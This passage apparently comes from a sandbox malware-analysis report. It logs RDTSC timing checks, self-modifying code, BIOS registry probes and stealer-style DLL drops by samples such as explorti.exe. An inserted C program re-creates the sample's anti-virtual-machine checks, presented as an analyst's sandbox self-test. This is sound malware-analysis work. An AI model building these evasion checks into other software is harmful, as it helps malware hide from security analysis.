Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB04AC second address: 4BB0579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDC1h 0x00000009 xor ax, EFE6h 0x0000000e jmp 00007F12E108FDC1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F12E108FDC0h 0x0000001a xor cl, FFFFFF88h 0x0000001d jmp 00007F12E108FDBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F12E108FDC4h 0x0000002e add si, E5E8h 0x00000033 jmp 00007F12E108FDBBh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F12E108FDC8h 0x0000003f or esi, 4E717848h 0x00000045 jmp 00007F12E108FDBBh 0x0000004a popfd 0x0000004b popad 0x0000004c push eax 0x0000004d jmp 00007F12E108FDC9h 0x00000052 xchg eax, ebp 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F12E108FDBDh 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0579 second address: 4BB05FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov eax, 2922EED9h 0x00000012 pushfd 0x00000013 jmp 00007F12E0FAFC86h 0x00000018 jmp 00007F12E0FAFC85h 0x0000001d popfd 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F12E0FAFC80h 0x00000025 adc cl, FFFFFFC8h 0x00000028 jmp 00007F12E0FAFC7Bh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F12E0FAFC85h 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD05A2 second address: 4BD068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007F12E108FDC3h 0x00000011 pop ecx 0x00000012 pushfd 0x00000013 jmp 00007F12E108FDC9h 0x00000018 sub ecx, 22B3C986h 0x0000001e jmp 00007F12E108FDC1h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov si, bx 0x0000002a call 00007F12E108FDC3h 0x0000002f mov di, cx 0x00000032 pop eax 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 jmp 00007F12E108FDBBh 0x0000003a mov ebp, esp 0x0000003c pushad 0x0000003d mov esi, 29018A2Bh 0x00000042 mov ah, 9Eh 0x00000044 popad 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F12E108FDC5h 0x0000004f jmp 00007F12E108FDBBh 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007F12E108FDC8h 0x0000005b adc cx, 9348h 0x00000060 jmp 00007F12E108FDBBh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD068E second address: 4BD06A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC84h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD06A6 second address: 4BD06AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD06AA second address: 4BD06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F12E0FAFC88h 0x00000014 or ecx, 3A5CC808h 0x0000001a jmp 00007F12E0FAFC7Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD06E4 second address: 4BD072E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e jmp 00007F12E108FDBEh 0x00000013 test eax, eax 0x00000015 pushad 0x00000016 push eax 0x00000017 mov bx, A7B0h 0x0000001b pop edi 0x0000001c mov edx, ecx 0x0000001e popad 0x0000001f je 00007F13533E3000h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov edi, 2A8D5CE0h 0x0000002d movsx ebx, ax 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD072E second address: 4BD0762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c jmp 00007F12E0FAFC89h 0x00000011 xor eax, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F12E0FAFC7Ah 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0762 second address: 4BD077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD077A second address: 4BD077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD077E second address: 4BD0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0784 second address: 4BD078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD078A second address: 4BD078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD078E second address: 4BD07B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edx, 3CED2130h 0x00000015 mov cx, bx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07B6 second address: 4BD07BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07BC second address: 4BD07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07C0 second address: 4BD07C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07C4 second address: 4BD0801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F12E0FAFC85h 0x00000012 adc eax, 7BE5D366h 0x00000018 jmp 00007F12E0FAFC81h 0x0000001d popfd 0x0000001e mov bl, ch 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0801 second address: 4BD0857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDC8h 0x00000009 or si, 5638h 0x0000000e jmp 00007F12E108FDBBh 0x00000013 popfd 0x00000014 mov ah, 64h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 retn 0004h 0x0000001c nop 0x0000001d mov esi, eax 0x0000001f lea eax, dword ptr [ebp-08h] 0x00000022 xor esi, dword ptr [003D2014h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e push eax 0x0000002f call 00007F12E58D061Ch 0x00000034 push FFFFFFFEh 0x00000036 pushad 0x00000037 mov dx, 4814h 0x0000003b mov si, bx 0x0000003e popad 0x0000003f pop eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F12E108FDC1h 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0857 second address: 4BD085D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD085D second address: 4BD0871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F12E58D0645h 0x00000010 mov edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bx, si 0x00000018 mov edi, ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0871 second address: 4BD0879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0879 second address: 4BD08E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push esi 0x0000000a movsx edx, ax 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F12E108FDC7h 0x00000015 sbb esi, 6BD0941Eh 0x0000001b jmp 00007F12E108FDC9h 0x00000020 popfd 0x00000021 mov ax, 09E7h 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F12E108FDC8h 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80016 second address: 4B80025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80025 second address: 4B8003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ecx, 3BEBE0D7h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cl, dh 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B8003C second address: 4B80058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC88h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80058 second address: 4B8005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B8005C second address: 4B800BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, 4B43h 0x0000000e mov bl, ah 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F12E0FAFC7Bh 0x00000017 mov ebp, esp 0x00000019 jmp 00007F12E0FAFC86h 0x0000001e and esp, FFFFFFF8h 0x00000021 jmp 00007F12E0FAFC80h 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F12E0FAFC87h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B800BE second address: 4B800E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edi, si 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edx, eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B800E4 second address: 4B80106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ecx 0x00000006 jmp 00007F12E0FAFC7Ch 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F12E0FAFC7Ch 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80106 second address: 4B80134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F12E108FDBCh 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F12E108FDC7h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80134 second address: 4B80223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007F12E0FAFC7Eh 0x00000011 xchg eax, esi 0x00000012 jmp 00007F12E0FAFC80h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov ch, dl 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F12E0FAFC88h 0x00000022 add ax, 0F08h 0x00000027 jmp 00007F12E0FAFC7Bh 0x0000002c popfd 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 jmp 00007F12E0FAFC84h 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a pushad 0x0000003b mov esi, 123C1CBDh 0x00000040 mov cx, C7B9h 0x00000044 popad 0x00000045 xchg eax, edi 0x00000046 pushad 0x00000047 mov edi, esi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c mov ax, CA4Fh 0x00000050 pushfd 0x00000051 jmp 00007F12E0FAFC84h 0x00000056 sbb eax, 3C92EEF8h 0x0000005c jmp 00007F12E0FAFC7Bh 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 jmp 00007F12E0FAFC86h 0x00000069 test esi, esi 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F12E0FAFC7Ah 0x00000074 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80223 second address: 4B80232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0DEE second address: 4BA0E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDBEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA02F2 second address: 4BA02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA02F8 second address: 4BA02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA02FC second address: 4BA030E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e movzx eax, di 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82FEAB second address: 82FEBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F12E108FDBAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 818303 second address: 818313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82EFE5 second address: 82EFF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F12E108FDBBh 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2A3 second address: 82F2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2A9 second address: 82F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2B2 second address: 82F2B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2B8 second address: 82F2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2BC second address: 82F2C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F426 second address: 82F42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F42B second address: 82F432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F432 second address: 82F43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Special instruction interceptor: First address: 58C43A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Special instruction interceptor: First address: 594634 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Special instruction interceptor: First address: 61199A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 85C43A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 864634 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 8E199A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Code function: 7_2_04BF0CB7 rdtsc 7_2_04BF0CB7
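The interceptor entries above show the pattern the sandbox is reporting: every logged block begins and ends with rdtsc, the instructions between the two reads are mostly push/pop and pushad/popad padding, and the real work comes after the second read (test eax, eax followed by jne, test ebx, ebx followed by je), so the sample is comparing the elapsed cycle count against a limit and branching on the result. The registry values queried by explorti.exe (DriverDesc of the first display adapter, SystemBiosVersion, VideoBiosVersion) are string probes with the same goal, and the Oreans.vxd, Software\WinLicense and HARDWARE\ACPI\DSDT\VBOX__ strings found in the memory dumps of the same binaries further down are consistent with the Oreans WinLicense protector supplying both checks. The program below is an added example, not code from the report or the sample: it performs both checks so an analyst can see what they return on a given analysis host. The 2000-cycle threshold, the marker list and the padding loop are assumptions for illustration; the registry part builds only on Windows (MinGW), and on every host the marker classifier is also run over three strings taken from this report's memory dumps.

```c
/* vm_selftest.c: added example, not code from the report or the sample. Re-creates the
 * two VM checks the lines above attribute to the sample (an RDTSC pair with padding, then
 * string probes of three registry values). Build: gcc -O2 vm_selftest.c (MinGW on Windows). */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdint.h>
#include <time.h>
#ifdef _WIN32
#  include <windows.h>
#endif

/* RDTSC on x86; other hosts fall back to a nanosecond clock so the program still runs. */
static uint64_t read_tsc(void) {
#if defined(__x86_64__) || defined(__i386__)
    return __builtin_ia32_rdtsc();
#else
    struct timespec ts;
    timespec_get(&ts, TIME_UTC);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
#endif
}

/* One measurement: rdtsc, padding (the sample uses push/pop and pushad/popad junk), rdtsc. */
static uint64_t tsc_delta_once(void) {
    volatile uint32_t sink = 0;
    uint64_t t0 = read_tsc();
    for (int i = 0; i < 256; i++) sink += (uint32_t)i;
    return read_tsc() - t0;
}

/* Minimum over several samples so one interrupt between the reads does not decide the verdict. */
uint64_t min_tsc_delta(int samples) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < samples; i++) { uint64_t d = tsc_delta_once(); if (d < best) best = d; }
    return best;
}

/* The decision behind the test/jne after the second rdtsc; the threshold is an assumption. */
int rdtsc_looks_instrumented(uint64_t delta, uint64_t threshold) { return delta > threshold; }

/* Assumed marker list (not the sample's); "virtual" also covers VirtualBox and "Virtual RAM". */
static const char *VM_MARKERS[] = { "vmware", "vbox", "hyper-v", "vmci", "virtual", NULL };

/* Case-insensitive marker search; returns the marker that matched or NULL. */
const char *vm_marker_in(const char *s) {
    char lower[512];
    size_t n = strlen(s);
    if (n >= sizeof lower) n = sizeof lower - 1;
    for (size_t i = 0; i < n; i++) lower[i] = (char)tolower((unsigned char)s[i]);
    lower[n] = '\0';
    for (int i = 0; VM_MARKERS[i]; i++)
        if (strstr(lower, VM_MARKERS[i])) return VM_MARKERS[i];
    return NULL;
}

#ifdef _WIN32
/* Read a REG_SZ/REG_MULTI_SZ value under HKLM; multi-strings are joined with spaces. */
static const char *reg_string(const char *key, const char *name, char *out, DWORD cb) {
    HKEY h; DWORD type = 0; LONG rc;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, key, 0, KEY_READ, &h) != ERROR_SUCCESS) return NULL;
    rc = RegQueryValueExA(h, name, NULL, &type, (LPBYTE)out, &cb);
    RegCloseKey(h);
    if (rc != ERROR_SUCCESS || (type != REG_SZ && type != REG_MULTI_SZ)) return NULL;
    for (DWORD i = 0; i + 1 < cb; i++)
        if (out[i] == '\0' && out[i + 1] != '\0') out[i] = ' ';
    return out;
}

/* The three values the report lists ({4d36e968-...} is the Display adapters class). */
int registry_probe_hits(void) {
    const char *probes[][2] = {
        { "SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0000", "DriverDesc" },
        { "HARDWARE\\DESCRIPTION\\System", "SystemBiosVersion" },
        { "HARDWARE\\DESCRIPTION\\System", "VideoBiosVersion" } };
    int hits = 0;
    char buf[1024];
    for (int i = 0; i < 3; i++) {
        const char *v = reg_string(probes[i][0], probes[i][1], buf, sizeof buf);
        const char *m = v ? vm_marker_in(v) : NULL;
        printf("%-18s = %s%s\n", probes[i][1], v ? v : "<not readable>", m ? "  <-- VM marker" : "");
        if (m) hits++;
    }
    return hits;
}
#endif

int main(void) {
    uint64_t d = min_tsc_delta(16);
    printf("min rdtsc delta over 16 samples: %llu -> %s\n", (unsigned long long)d,
           rdtsc_looks_instrumented(d, 2000) ? "instrumented or virtualised?" : "looks native");
    const char *from_report[] = { "BiosVendor:VMware, Inc.", "HARDWARE\\ACPI\\DSDT\\VBOX__", "Hyper-V (guest)" };
    for (int i = 0; i < 3; i++) printf("%-28s -> %s\n", from_report[i], vm_marker_in(from_report[i]));
#ifdef _WIN32
    printf("registry probes hitting a VM marker: %d of 3\n", registry_probe_hits());
#endif
    return 0;
}
```

Run it once on bare metal and once inside the analysis VM: the cycle delta is the number the sample's test/jne branches on, and any registry probe that prints a VM marker is a value that an analyst hardening the sandbox would want to rewrite. The minimum over several samples matters, because a single measurement inflated by an interrupt would otherwise make a native host look virtualised.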
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1036
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1254
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 362
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Window / User API: threadDelayed 1457
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Window / User API: threadDelayed 946
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
